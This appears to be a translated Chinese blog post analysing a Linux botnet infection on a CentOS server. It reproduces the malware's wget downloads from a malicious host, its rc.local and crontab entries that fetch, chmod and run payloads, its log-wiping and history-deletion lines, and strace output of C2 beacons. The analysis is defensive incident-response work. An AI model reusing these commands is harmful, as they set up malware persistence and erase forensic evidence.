基于Linux平台下的僵尸网络病毒《比尔盖茨》

感觉分析的很好,所以决定翻译出来,希望和大家多多交流O(∩_∩)O~

转载请注明出处:http://blog.csdn.net/u010484477     O(∩_∩)O谢谢

关键字:病毒,linux,信息安全

我昨天写的日志里面提到,家用路由器在x86的CentOS系统下奇怪的自己行动,像是在自己加载处理器。于是我决定爬上去看看,在那里发生了什么,然后我马上意识到有人爬到服务器和挂在进程中的dgnfd564sdf.com。主要是下面几个方面atddd,cupsdd,cupsddh,
ksapdd, kysapdd, skysapdd ,
xfsdxd
等等

root      4741  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/skysapd

启动分析:

起初我摸索着看,到底是什么让我的电脑如此的妥协。第一件事,我想到/ etc / rc.local检查。有如下:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd

“嗯,我想从root那下手,就像这样:

# crontab -e
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
…
*/1 * * * * killall -9 nfsd4
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
# daemon‘s notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
…
*/1 * * * * killall -9 profild.key
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
# Notice that tasks will be started based on the cron‘s system
…
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use ‘*‘ in these fields (for ‘any‘).#
…
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
…
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
…
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
…
…
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
# Edit this file to introduce tasks to be run by cron.
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.

哦。他是183кб4036大小,行。你见过183кб crontab的大小吗?就像我所看到的这样。

当我进入到服务器,这些过程已经不是什么都不做(不被处理器,没有使用网络)。他们已经决定停止执行,恢复业务,不让这些现有的特征一直存在,防止被人发现。他们的strace命令就是这样的:

[[email protected] etc]# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, 

[[email protected] etc]# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer)
close(3)                                = 0
futex(0x816e8a8, FUTEX_WAKE, 1)         = 1
futex(0x816e8a4, FUTEX_WAKE, 1)         = 1
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detached

在这个过程看起来他们几乎什么都没做,只是偶尔进行的数据采集。当然,他们也刷了刷/ etc / rc.local crontab,这些可执行文件(他们都有SUID位,使得他们有能力进行他们想做的事,但是他为什么没有删除,也没有改变?),只是刷了/ etc /profile

unset MAILCHECK

这意味着在计算机上的僵尸网络是大约7小时。可能实际上没有那么多,但不低。

现在需要检查是否已修改任何系统文件。在CentOS这足够的执行:

rpm -Va

我很高兴该命令输出了和我预想一样的东西:

[[email protected] ~]# rpm -Va
S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/issue
S.5....T.  c /etc/crontab
S.5....T.  c /etc/nagiosgraph/access.conf
S.5....T.  c /etc/nagiosgraph/nagiosgraph.conf
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T.    /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....    /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T.  c /etc/tor/torrc
.M.......    /
.......T.  c /etc/ppp/options.pptpd
S.5....T.  c /etc/pptpd.conf
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/vsftpd/vsftpd.conf
.M.......    /var/ftp/pub
..5....T.  c /etc/sysconfig/PlexMediaServer
.......T.    /usr/lib/plexmediaserver/start.sh
S.5....T.  c /etc/sysconfig/lm_sensors
S.5....T.  c /etc/php.ini
S.5....T.  c /etc/httpd/conf/httpd.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
S.5....T.  c /etc/cacti/db.php
S.5....T.  c /etc/cron.d/cacti
S.5....T.  c /etc/httpd/conf.d/cacti.conf
.M.......    /usr/share/cacti
.M.......    /usr/share/cacti/about.php
.M.......    /usr/share/cacti/auth_changepassword.php
.M.......    /usr/share/cacti/auth_login.php
.M.......    /usr/share/cacti/cdef.php
.M.......    /usr/share/cacti/cmd.php
.M.......    /usr/share/cacti/color.php
.M.......    /usr/share/cacti/data_input.php
.M.......    /usr/share/cacti/data_queries.php
.M.......    /usr/share/cacti/data_sources.php
.M.......    /usr/share/cacti/data_templates.php
.M.......    /usr/share/cacti/gprint_presets.php
.M.......    /usr/share/cacti/graph.php
.M.......    /usr/share/cacti/graph_image.php
.M.......    /usr/share/cacti/graph_settings.php
.M.......    /usr/share/cacti/graph_templates.php
.M.......    /usr/share/cacti/graph_templates_inputs.php
.M.......    /usr/share/cacti/graph_templates_items.php
.M.......    /usr/share/cacti/graph_view.php
.M.......    /usr/share/cacti/graph_xport.php
.M.......    /usr/share/cacti/graphs.php
.M.......    /usr/share/cacti/graphs_items.php
.M.......    /usr/share/cacti/graphs_new.php
.M.......    /usr/share/cacti/host.php
.M.......    /usr/share/cacti/host_templates.php
.M.......    /usr/share/cacti/images
.M.......    /usr/share/cacti/images/arrow.gif
.M.......    /usr/share/cacti/images/auth_deny.gif
.M.......    /usr/share/cacti/images/auth_login.gif
.M.......    /usr/share/cacti/images/auth_logout.gif
.M.......    /usr/share/cacti/images/button_add.gif
.M.......    /usr/share/cacti/images/button_cancel.gif
.M.......    /usr/share/cacti/images/button_cancel2.gif
.M.......    /usr/share/cacti/images/button_clear.gif
.M.......    /usr/share/cacti/images/button_colapse_all.gif
.M.......    /usr/share/cacti/images/button_create.gif
.M.......    /usr/share/cacti/images/button_default.gif
.M.......    /usr/share/cacti/images/button_delete.gif
.M.......    /usr/share/cacti/images/button_expand_all.gif
.M.......    /usr/share/cacti/images/button_export.gif
.M.......    /usr/share/cacti/images/button_go.gif
.M.......    /usr/share/cacti/images/button_help.gif
.M.......    /usr/share/cacti/images/button_import.gif
.M.......    /usr/share/cacti/images/button_no.gif
.M.......    /usr/share/cacti/images/button_purge.gif
.M.......    /usr/share/cacti/images/button_refresh.gif
.M.......    /usr/share/cacti/images/button_save.gif
.M.......    /usr/share/cacti/images/button_view.gif
.M.......    /usr/share/cacti/images/button_yes.gif
.M.......    /usr/share/cacti/images/cacti_about_logo.gif
.M.......    /usr/share/cacti/images/cacti_backdrop.gif
.M.......    /usr/share/cacti/images/cacti_backdrop2.gif
.M.......    /usr/share/cacti/images/cacti_logo.gif
.M.......    /usr/share/cacti/images/calendar.gif
.M.......    /usr/share/cacti/images/delete_icon.gif
.M.......    /usr/share/cacti/images/delete_icon_large.gif
.M.......    /usr/share/cacti/images/disable_icon.png
.M.......    /usr/share/cacti/images/enable_icon.png
.M.......    /usr/share/cacti/images/enable_icon_disabled.png
.M.......    /usr/share/cacti/images/favicon.ico
.M.......    /usr/share/cacti/images/graph_page_top.gif
.M.......    /usr/share/cacti/images/graph_properties.gif
.M.......    /usr/share/cacti/images/graph_query.png
.M.......    /usr/share/cacti/images/graph_zoom.gif
.M.......    /usr/share/cacti/images/hide.gif
.M.......    /usr/share/cacti/images/install_icon.png
.M.......    /usr/share/cacti/images/install_icon_disabled.png
.M.......    /usr/share/cacti/images/left_border.gif
.M.......    /usr/share/cacti/images/menu_line.gif
.M.......    /usr/share/cacti/images/menuarrow.gif
.M.......    /usr/share/cacti/images/move_down.gif
.M.......    /usr/share/cacti/images/move_left.gif
.M.......    /usr/share/cacti/images/move_right.gif
.M.......    /usr/share/cacti/images/move_up.gif
.M.......    /usr/share/cacti/images/reload_icon_small.gif
.M.......    /usr/share/cacti/images/shadow.gif
.M.......    /usr/share/cacti/images/shadow_gray.gif
.M.......    /usr/share/cacti/images/show.gif
.M.......    /usr/share/cacti/images/tab_cacti.gif
.M.......    /usr/share/cacti/images/tab_console.gif
.M.......    /usr/share/cacti/images/tab_console_down.gif
.M.......    /usr/share/cacti/images/tab_graphs.gif
.M.......    /usr/share/cacti/images/tab_graphs_down.gif
.M.......    /usr/share/cacti/images/tab_mode_list.gif
.M.......    /usr/share/cacti/images/tab_mode_list_down.gif
.M.......    /usr/share/cacti/images/tab_mode_preview.gif
.M.......    /usr/share/cacti/images/tab_mode_preview_down.gif
.M.......    /usr/share/cacti/images/tab_mode_tree.gif
.M.......    /usr/share/cacti/images/tab_mode_tree_down.gif
.M.......    /usr/share/cacti/images/tab_settings.gif
.M.......    /usr/share/cacti/images/tab_settings_down.gif
.M.......    /usr/share/cacti/images/transparent_line.gif
.M.......    /usr/share/cacti/images/uninstall_icon.gif
.M.......    /usr/share/cacti/images/view_none.gif
.M.......    /usr/share/cacti/include
.M.......    /usr/share/cacti/include/auth.php
.M.......    /usr/share/cacti/include/bottom_footer.php
.M.......    /usr/share/cacti/include/global.php
.M.......    /usr/share/cacti/include/global_arrays.php
.M.......    /usr/share/cacti/include/global_constants.php
.M.......    /usr/share/cacti/include/global_form.php
.M.......    /usr/share/cacti/include/global_settings.php
.M.......    /usr/share/cacti/include/jscalendar
.M.......    /usr/share/cacti/include/jscalendar/calendar-setup.js
.M.......    /usr/share/cacti/include/jscalendar/calendar.js
.M.......    /usr/share/cacti/include/jscalendar/lang
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-af.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-al.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-bg.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-big5-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-big5.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-br.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ca.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-cs-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-cs-win.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-da.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-de.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-du.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-el.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-en.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-es.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-fi.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-fr.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-he-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-hr-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-hr.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-hu.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-it.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-jp.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ko-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ko.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-lt-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-lt.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-lv.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-nl.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-no.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-pl-utf8.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-pl.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-pt.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ro.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ru.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-ru_win_.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-si.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-sk.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-sp.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-sv.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-tr.js
.M.......    /usr/share/cacti/include/jscalendar/lang/calendar-zh.js
.M.......    /usr/share/cacti/include/jscalendar/lang/cn_utf8.js
.M.......    /usr/share/cacti/include/layout.js
.M.......    /usr/share/cacti/include/main.css
.M.......    /usr/share/cacti/include/plugins.php
.M.......    /usr/share/cacti/include/top_graph_header.php
.M.......    /usr/share/cacti/include/top_header.php
.M.......    /usr/share/cacti/include/treeview
.M.......    /usr/share/cacti/include/treeview/ftiens4.js
.M.......    /usr/share/cacti/include/treeview/ftiens4_export.js
.M.......    /usr/share/cacti/include/treeview/ftv2blank.gif
.M.......    /usr/share/cacti/include/treeview/ftv2lastnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2mlastnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2mnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2node.gif
.M.......    /usr/share/cacti/include/treeview/ftv2plastnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2pnode.gif
.M.......    /usr/share/cacti/include/treeview/ftv2vertline.gif
.M.......    /usr/share/cacti/include/treeview/ua.js
.M.......    /usr/share/cacti/include/zoom.js
.M.......    /usr/share/cacti/index.php
.M.......    /usr/share/cacti/install
.M.......    /usr/share/cacti/install/0_8_1_to_0_8_2.php
.M.......    /usr/share/cacti/install/0_8_2_to_0_8_2a.php
.M.......    /usr/share/cacti/install/0_8_2a_to_0_8_3.php
.M.......    /usr/share/cacti/install/0_8_3_to_0_8_4.php
.M.......    /usr/share/cacti/install/0_8_4_to_0_8_5.php
.M.......    /usr/share/cacti/install/0_8_5a_to_0_8_6.php
.M.......    /usr/share/cacti/install/0_8_6_to_0_8_6a.php
.M.......    /usr/share/cacti/install/0_8_6c_to_0_8_6d.php
.M.......    /usr/share/cacti/install/0_8_6d_to_0_8_6e.php
.M.......    /usr/share/cacti/install/0_8_6f_to_0_8_6g.php
.M.......    /usr/share/cacti/install/0_8_6g_to_0_8_6h.php
.M.......    /usr/share/cacti/install/0_8_6h_to_0_8_6i.php
.M.......    /usr/share/cacti/install/0_8_6j_to_0_8_7.php
.M.......    /usr/share/cacti/install/0_8_7_to_0_8_7a.php
.M.......    /usr/share/cacti/install/0_8_7a_to_0_8_7b.php
.M.......    /usr/share/cacti/install/0_8_7b_to_0_8_7c.php
.M.......    /usr/share/cacti/install/0_8_7c_to_0_8_7d.php
.M.......    /usr/share/cacti/install/0_8_7d_to_0_8_7e.php
.M.......    /usr/share/cacti/install/0_8_7e_to_0_8_7f.php
.M.......    /usr/share/cacti/install/0_8_7f_to_0_8_7g.php
.M.......    /usr/share/cacti/install/0_8_7g_to_0_8_7h.php
.M.......    /usr/share/cacti/install/0_8_7h_to_0_8_7i.php
.M.......    /usr/share/cacti/install/0_8_7i_to_0_8_8.php
.M.......    /usr/share/cacti/install/0_8_8_to_0_8_8a.php
.M.......    /usr/share/cacti/install/0_8_to_0_8_1.php
.M.......    /usr/share/cacti/install/index.php
.M.......    /usr/share/cacti/install/install_finish.gif
.M.......    /usr/share/cacti/install/install_next.gif
.M.......    /usr/share/cacti/lib
.M.......    /usr/share/cacti/lib/adodb
.M.......    /usr/share/cacti/lib/adodb/adodb-csvlib.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-datadict.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-error.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-errorhandler.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-errorpear.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-exceptions.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-iterator.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-lib.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-pear.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-perf.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-php4.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-time.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb-xmlschema.inc.php
.M.......    /usr/share/cacti/lib/adodb/adodb.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-access.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-db2.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-firebird.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-generic.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-ibase.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-informix.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-mssql.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-mysql.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-oci8.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-postgres.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-sapdb.inc.php
.M.......    /usr/share/cacti/lib/adodb/datadict/datadict-sybase.inc.php
.M.......    /usr/share/cacti/lib/adodb/drivers
